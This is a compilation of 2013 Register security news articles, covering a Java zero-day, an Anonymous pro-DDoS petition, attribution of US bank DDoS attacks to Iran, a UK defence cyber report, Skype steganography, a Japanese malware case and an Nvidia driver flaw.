STE WILLIAMS

A new Java zero-day security vulnerability is already being actively exploited to compromise PCs. The best way to defend against the attacks is to disable any Java browser plugins on your systems.

The offending bug is present in fully patched and up-to-date installations of the Java platform, now overseen by database giant Oracle, according to Jaime Blasco, head of labs at security tools firm AlienVault.

“The exploit is the same as the zero-day vulnerabilities we have been seeing in the past year in IE, Java and Flash,” Blasco warned.

“The hacker can virtually own your computer if you visit a malicious link thanks to this new vulnerability. At the moment, there is no patch for this vulnerability, so the only way to protect yourself is by disabling Java.”

The exploit targets Java 7 update 10 and prior versions. No fix is available and early indications suggest that exploitation is widespread. Brian Krebs reckons the exploit has found its way into crimeware toolkits, such as the Blackhole Exploit Kit, which will use the hole to infect victims with software nasties.

Java vulnerabilities were abused by the infamous Flashback Trojan, creating the first botnet on Mac OS X machines in the process last year. In the years before that attacks on Java and Adobe applications have eclipsed browser bugs as hackers’ favourite way into a system.

In all but a limited number of cases Java support in web browsers is not mandatory for home users, unless required by a banking website or similar, so disabling plugins even as a temporary measure is a good idea. Businesses, on the other hand, that rely on Java for particular applications are not so fortunate.

While waiting for a patch from Oracle to plug the gaping hole, instructions on how to turn off Java in browsers can be found in this blog post by Graham Cluley of Sophos. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/10/java_0day/

The loosely organized hackers of Anonymous don’t just launch distributed denial-of-service attacks for the lulz. They do it to send a message, which is why they’ve petitioned the Obama administration to recognize DDoS as a legal form of protest.

The petition, which was filed on the White House’s We the People website, argues that DDoS “is not a form of hacking in any way” and that it’s really not much different than repeatedly hitting the refresh button in your web browser, albeit on a much larger scale:

It is, in that way, no different than any “occupy” protest. Instead of a group of people standing outside a building to occupy the area, they are having their computer occupy a website to slow (or deny) service of that particular website for a short time.

The petition goes on to demand that anyone who has been jailed for participating in a DDoS attack should be immediately released – a nice touch – and that anything related to the attack should be expunged from their criminal records.

DDoS attacks are indeed one of the go-to methods used when Anonymous wants to make a point. The group used the technique to take down UK government websites in August in protest of the treatment of WikiLeaks founder Julian Assange, and again in November in retaliation for Israel’s bombing of sites in Gaza.

Not all such attacks are launched for similarly high-minded reasons, however, and given the recent spate of cyberattacks on US banks – which are now believed to have been orchestrated by the Iranian government – this petition is unlikely win much sympathy from the White House.

Not to mention the small problem that the We the People site seems to have become a favorite forum for pranks and jokes. Recent oddball petitions have included one request to build a real-life Death Star, and another to remake the American justice system in Judge Dredd’s image.

Then again, I guess that means the pro-DDoS petition isn’t actually the silliest idea we’ve heard.

The petition does not indicate who originally filed it, or whether it represents the work of an organized group or just one person. But hey, this is Anonymous after all, and if you say you’re affiliated, you are.

Whoever filed it, though, they don’t have much company so far. The petition will need to reach a goal of 25,000 signatures to receive an official response from the Obama administration. As of this writing, it had just 681. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/10/anonymous_ddos_free_speech/

Denial-of-service attacks against US banks’ web systems were the work of Iran rather than Islamic activists, says a former American government official.

A group called the Izz ad-Din al-Qassam Cyber Fighters claimed responsibility for two waves of cyber-attacks against US banks including US Bancorp, Bank of America, Citigroup, Wells Fargo that took place in September and December. The stated reason for the “protest” attacks was religious outrage over the continuing presence on YouTube of the inflammatory Innocence of Muslims video on YouTube.

James A Lewis of the Center for Strategic and International Studies in Washington told the New York Times that the attacks were actually the work of Iran, rather than outraged hacktivists. He reckons the aim was actually retaliation over the deployment of Stuxnet and other cyberweapons against Iran as well as economic sanctions.

Security researchers at Arbor Networks concluded last month that in both cases attack traffic was launched from insecure websites rather than malware-infected PCs. Compromised PHP web applications and insecure WordPress installation were pressed into service as part of a PHP Web server botnet, controlled by tools such as bRobot.

The skill involved in putting together the attacks as well as the use of server based resources has apparently convinced US government official that a state-sponsored entity, namely Iran, rather than hacktivists are behind the attacks. ““There is no doubt within the US government that Iran is behind these attacks,” Lewis, a former official in the state and commerce departments, told the NYT. Lewis points to the volume of traffic involved in the US bank attacks (“multiple times” the amount that Russia directed at Estonia in 2007) in attempting to substantiate his arguments but as the NYT points out “American officials have not offered any technical evidence to back up their claims”.

Security vendors are able to say that the attacks against US banks are fairly sophisticated but cannot pinpoint who developed them. “The scale, the scope and the effectiveness of these attacks have been unprecedented,” said Carl Herberger, vice president of security solutions at Israeli-based security firm Radware told the NYT. “There have never been this many financial institutions under this much duress.”

Researchers at Radware discovered that cloud services and public web hosting servers* had been infected with a strain of malware, called Itsoknoproblembro. “The malware has existed for years, but the banking attacks were the first time it used data centers to attack external victims,” the NYT reports, adding that Itsoknoproblembro was designed to be difficult if not impossible to trace back to command and control systems. Attackers used infected servers to disgorge attack traffic at each banking site until it slowed or collapsed, according to Radware. Peak attack traffic against US banks hit 70 Gbps.

An entry on Radware’s website that Itsoknoproblembro is a PHP-based hacker tool that has recently been customised to serve in DDoS attacks.

The ‘itsoknoproblembro’ tool was designed and implemented as a general purpose PHP script injected into a victim’s machine allowing the attacker to upload and execute arbitrary Perl scripts on the target’s machine.

The ‘itsoknoproblembro’ script injects an encrypted payload, in order to bypass IPS and Malware gateways into the website main file index.php, allowing the attacker to upload new Perl scripts at any time.

Initial server infection is usually done by using the well known Remote File Inclusion (RFI) technique. By uploading Perl scripts that run different DOS flood vectors, the server might act as a bot in a DDOS botnet army.

Although originally designed for general purpose, some variants of this tool found in the wild were customized to act as a proprietary DDOS tool, implementing the flood vector logics inside without the need to upload additional scripts.

DDoS protection service firm Prolexic launched a suite of SNORT rules and a log analysis tool to defend against itsoknoproblembro last week.

It also links the threat to attacks against the US banking industry. But the tool has also been used against the energy and hosting provider industries. “The attack vectors include POST, GET, TCP and UDP floods, with and without proxies, including a so-called Kamikaze GET flood script that can repeatedly relaunch automated attacks,” according to a statement by Prolexic.

Using a cloud-based system to launch denial of service attacks rather than botnet networks of compromised PCs shows that whoever is behind the attacks is keeping up with the latest trends in technology. It’s hardly evidence of state involvement, at least by itself. There’s nothing in what either Prolexic, Radware or Arbor are saying to suggest the latest attacks are state-sponsored much less pointing the finger of blame towards Iran.

Nonetheless, unnamed US intelligence officials appear adamant that the Izz ad-Din al-Qassam Cyber Fighters is actually a cover for Iran. ®

Bootnote

Infected web servers are called bRobots by both Radware and Prolexic. This naming convention differentiates paned servers from the compromised PCs (zombies, bots or drones) in conventional botnet networks.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/us_banks_ddos_blamed_on_iran/

UK armed forces’ dependence on information and communication technology could leave the nation vulnerable in the event of a cyber attack, according to a study by a committee of MPs.

A report by the Commons’ Defence Committee suggests that the UK Government still has some ground to cover in its approach to the nation’s cyber security even two years after placing cybersecurity as a tier one threat against the UK, on a par with global terrorism. The National Cyber Security Programme allocated £650m over five years to boost the UK’s cyber-security defences. The MoD received a £90m slice of this pie.

Then in 2012-13 alone, the MoD is reaching into its own coffers to supplement these funds by £30m. But it seems even this is not enough.

The MPs heard concerns that the “trend” of using off-the-shelf commercial products is increasing military vulnerability to cyber-assault. There were also suggestions that people with the necessary skills for cyber warfare might be recruited and brought into the military, perhaps as reservists.

Chair of the Committee, Rt Hon James Arbuthnot MP, said extra ministerial attention ought to be applied to develop improved cyber security.

“The Government needs to put in place – as it has not yet done – mechanisms, people, education, skills, thinking and policies which take into account both the opportunities and the vulnerabilities which cyberspace presents,” argued Arbuthnot.

Evidence received by the Committee suggested a sustained cyber assault could impede the ability of the armed forces to “operate effectively” due to their dependence on information and communication technology. The Committee quizzed MoD witnesses about its backup systems in these circumstances.

“We have asked the Government to set out details of the contingency plans it has in place should such an attack occur. If it has none, it should say so – and urgently create some,” Arbuthnot added.

Details of what types of cyberattack might be possible were left out of the committee’s report.

The MPs heard testimony from academics (including John Bassett, associate fellow of Cyber-security at the Royal United Services Institute, Professor Brian Collins, chair of engineering policy at University College London, and others; military personnel including Air Vice-Marshal Jonathan Rigby, Major-General Jonathan Shaw, assistant chief of defence staff and Air Commodore Tim Bishop, head of global operations security control centre; as well as Cabinet ministers Nick Harvey MP, minister for the armed forces, and Rt Hon Francis Maude MP, the Cabinet Office minister.

Written submissions were provided by McAfee, Symantec and Trend Micro as well as BAE Systems, EADS and Raytheon. That group of six from the military industrial anti-malware complex accounted for more than half the written submissions.

Unsurprisingly after this, the MPs came away with the idea that improved MoD and industry collaboration, tied together with increased spending on cyber-security technology, was a good idea.

In a statement, the Committee said it was “impressed by aspects of the co-operation and joint working between the MoD and private sector contractors”. The MPs also supported attempts to boost the cyber security sector in the UK, which would help the MoD “deliver military capabilities both to confront high-end threats and to provide a potential offensive capability”.

Arbuthnot added:

“The opportunity created by cyber tools and techniques to enhance the military capabilities of our Armed Forces is clear. We want to see the MoD explore this thoroughly. For this reason, we support the use of National Cyber Security Programme funding to develop these capabilities, but also wish to be assured that the MoD will maintain its investment in existing defence intelligence services which provide a vital UK cross-government capability.”

Vendors broadly welcomed the committee’s report. Martin Sutherland, Managing Director of BAE Systems Detica commented:

“The UK’s ability to defend itself against cyber attacks does not rest in the hands of any single entity. Ensuring our national and economic security in an increasingly interconnected world requires all organisations – government, public and private sector – to put in place robust cyber security defences as well as appropriate response procedures in the event of a successful attack.

“To improve the effectiveness of these measures we need to encourage more organisations to share best-practice approaches to cyber security and provide more information about the nature of the attacks they’re seeing, particularly given that many private sector firms act as suppliers to Government or are delivering essential services that our nation relies upon every day,” he added.

Sutherland said that the UK is perhaps more prepared for cyber-attack than the defence committee gave it credit for.

“The UK’s strategy is still going through a process of implementation; however it is progressing well and has a mature approach in comparison to many other nations. Interestingly, the UK was placed first of the G20 in its ability to withstand cyber attacks and deploy the appropriate infrastructure for a productive economy, according to Booz Allen Hamilton’s recent Cyber Power Index. However, there is still a long way to go before we can say that we are successfully countering cyber threats.”

Rob Cotton, chief executive of global information assurance firm, NCC Group, stressed the need for the UK military to develop comprehensive information security policy.

“£650m has allegedly been invested in this country’s cyber defences, yet instead of being drilled into real expertise it’s been juggled between departmental budgets. It’s particularly worrying that the best advice offered is repeatedly to simply update antivirus protection – far more sophisticated and sustained responses are needed.

“The targets of a sustained cyber threat would almost certainly include private sector businesses – from energy companies to manufacturing firms and public transport operators – as well as the military itself,” he added. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/defence_cyber_security_review/

Coppers will soon give evidence in almost half the courts in England and Wales from their police stations via video-conferencing links.

Justice minister Damian Green announced the government will triple the number of installed video connections to further free up officers’ time and potentially save taxpayers some cash.

The Ministry of Justice will stump up for the expanded video-over-IP service to spare bobbies the trek to court to give evidence during prosecutions. Instead, they can stay at their base, flick on a webcam and be beamed into a TV monitor in the relevant hearing.

“Under existing practice a considerable amount of time and money is wasted by police officers travelling to and from court and waiting outside the courtroom to give evidence,” said a Ministry of Justice spokesperson.

The seven police forces already kitted out with the video links have used the technology in an estimated 75,000 cases and saved 300 man hours as well as transport costs and cut the need to move prisoners between hearings and custody, according to the ministry. Essex, London, Kent, Cheshire, South Wales, Hertfordshire and West Midlands all use the connections.

There are a total of 42 so-called criminal justice areas in England and Wales, and the new roll-out will reach 20 in total.

Vulnerable witnesses unwilling to be in the same court room as the accused and even defendants on their first hearing can also be beamed into TV screens from afar.

There is no further information on exactly which webcam systems will used, but the ministry told The Reg that the video feeds are scrambled. The officials also said the video-over-IP service is not Skype, but video-conferencing on a secure network already used by criminal justice workers. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/video_ip_links_to_court/

Most of the credit and debit card fraud in Europe can be pinpointed to criminal transactions in the US, a police report has said.

EU police service Europol said that the European Union had invested heavily in the 3-D secure protocol, offered by Visa as Verified by Visa and by MasterCard as Mastercard SecureCode, as well as on the transition to chip-and-PIN, but these security measures weren’t being used worldwide.

Chip-and-PIN (Europay, MasterCard and Visa) has been key to getting rid of domestic card fraud, although organised crime gangs were still pulling in €1.5bn a year from ripping off Europeans, cops said.

Criminals are able to target chip-enabled cards when they’re used in cash machines and payment machines in the US, Dominican Republic, Colombia, Russian Federation, Brazil and Mexico.

“The ultimate solution to this problem would be to implement the EMV standard on a global level, including making United States’ merchants compliant,” Europol said in its report. “Specific discussions on that are currently ongoing, however it is difficult to predict if, and when, the final stage of compliance might be reached.”

With the extra security of PIN numbers for physical transactions, most payment card thievery now happens online, Europol said. Around 60 per cent of fraud losses in 2011 happened in transactions where the card wasn’t seen, such as online or over the phone payments.

Credit card and bank account information traded online is used to create cloned cards, which can then be used to buy goods online. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/european_card_fraud_us/

Polish security researchers have come up with a cunning method to transmit hidden messages using the silence packets transmitted during a Skype call.

The VoIP service transmits voice data in 130-byte packets, and silences in 70-byte packets, a difference that creates a potential means to conceal a hidden encrypted message in the latter. The novel form of steganography was devised by Wojciech Mazurczyk, Krysztof Szczypiorski and Maciej Karaœ, researchers at the Institute of Telecommunications of the Warsaw University of Technology.

The crypto boffins developed an application, dubbed SkypeHide (or SkyDe), that embeds an encrypted message using structured sequences of silent packets. The same software running on a receiving computer is used to extract the concealed message.

Hidden messages can contain text, audio or video content, although the maximum transmission rate of 1kbps would more or less preclude the practical transmission of video clips. Packets generated by SkypeHide Would be difficult to distinguish from normal Skype traffic, Trusted Third Party (via Google Translate) reports.

The latest technique builds on earlier research by Mazurczyk and Szczypiorski into steganography using VoIP streams. Four years ago the researchers developed techniques for using unused fields in the RTCP (Real-Time Control Protocol) and RTP (Real-Time Transport Protocol) VoIP protocols to transmit hidden messages.

The researchers hope to present more about the technology at 1st ACM Workshop on Information Hiding and Multimedia Security conference in Montpellier, France, in June. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/skype_stego/

An anonymous cyber villain has led Japanese police on a merry dance over the past few months, culminating in the capture on Monday of a cat said to be carrying a computer virus on a memory card attached to its collar.

Detectives with the country’s National Police Agency (NPA) nabbed the creature on an island near Tokyo after a bizarre treasure hunt was sparked on New Year’s Day when media outlets received an email offering them the “chance for a big scoop”, AFP reported.

The emails contained a set of riddles designed to lead the recipients to the memory card – although police initially went on a wild goose chase up a mountainside before a further message apparently clarified the location of the pesky feline.

The virus in question is said to be iesys.exe, dubbed the “Remote Control Virus”, which, as the name suggests, is capable of controlling a compromised computer from a remote location, according to Symantec.

This is relevant because the anonymous cyber criminal is believed to have been behind a series of terrorist threats sent last year by email from various IP addresses and posted to popular Japanese Reddit clone 2channel.

These included bomb threats against a school and kindergarten attended by the Emperor’s grandchildren and a warning of an impending killing spree on the streets of Osaka.

In a hugely embarrassing incident during the investigation, the NPA arrested four suspects who were likely victims of iesys.exe – which was used to send the offending emails from their computers – rather than perpetrators of an attack.

One such suspect was held for weeks before a broadcaster was sent another anonymous message which could only have come from the genuine culprit, AFP said.

The shadowy figure remains at large, with police, now thoroughly fed up with this cat-and-mouse game, have announced a Y3 million (£21,400) reward for his, her – or it’s – capture. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/japan_cyberterror_cat/

A Warsaw-based security researcher says the packets that Skype sends during silence can be used to carry secret messages in a conversation.

When participants in a call are speaking, Skype sends the audio in 130-byte packets, while during silence it sends 70-byte packets. According to New Scientist, Wojciech Mazurczyk of Warsaw University of Technology’s Institute of Telecommunications has created software which he’s dubbed “SkypeHide” to put private, encrypted messages in the silence packets.

This “packet hijack” is hard to detect, Mazurczyk says. “The secret data is indistinguishable from silence-period traffic, so detection of SkypeHide is very difficult,” he claims.

The software was created in collaboration with two other researchers, Maciej Karaś and Krzysztof Szczypiorski.

Mazurczyk says the steganography technique can carry any kind of data – voice, text or video – and while the secret messages only had a data rate of 1K bps during calls, he believes they would be difficult to intercept.

Last year, the now-Microsoft subsidiary denied that it was rewriting its software to be more law-enforcement-friendly. However, agencies worldwide are looking for ways to bring the popular VoIP system under the loving embrace of interception regimes.

The group intends to present SkypeHide at the First ACM Information Hiding and Multimedia Security Workshop, being held at the University of Montpellier in June. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/09/steganography_in_skype/

Nvidia has plugged a critical flaw in its graphics card software that allowed hackers to gain “super-user” access to vulnerable PCs over a network.

The Nvidia GeForce display driver update, version 310.90, also features a number of other bug fixes and performance upgrades.

“The vulnerability allows a remote attacker with a valid domain account to gain super-user access to any desktop or laptop running the vulnerable service,” HD Moore, the developer of Metasploit and chief security officer at Rapid7, told SecurityWeek.

“This flaw also allows an attacker (or rogue user) with a low-privileged account to gain super-access to their own system, but the real risk to enterprises is the remote vector,” he added.

The critical privilege elevation flaw was discovered by UK security researcher Peter Winter-Smith.

The driver update can be downloaded here. The accompanying summary of the update mentions a “security update for the Nvidia Display Driver service (nvvsvc.exe)” in one sentence but concentrates on claimed performance improvements for gamers, particularly fans of Call of Duty: Black Ops 2 and Assassin’s Creed III.

More details of the update can be found in a bumper 67-page release notes document on Nvidia’s website (PDF). ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2013/01/08/nvidia_security_update/